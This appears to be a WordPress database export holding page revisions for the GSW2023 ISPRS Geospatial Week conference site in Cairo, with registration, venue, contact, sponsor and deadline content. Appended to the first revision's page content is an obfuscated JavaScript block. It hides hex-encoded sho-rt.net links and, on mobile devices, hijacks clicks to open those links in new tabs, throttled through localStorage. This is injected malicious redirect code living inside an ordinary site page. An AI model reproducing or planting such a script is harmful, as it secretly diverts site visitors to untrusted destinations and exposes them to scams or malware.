width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-16 01:42:46','2023-05-16 01:42:46','',3066,'https://gsw2023.com/?p=4491',0,'revision','',0),
(4492,1,'2023-05-16 01:43:56','2023-05-16 01:43:56','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201399453{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"415\" height=\"126\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" 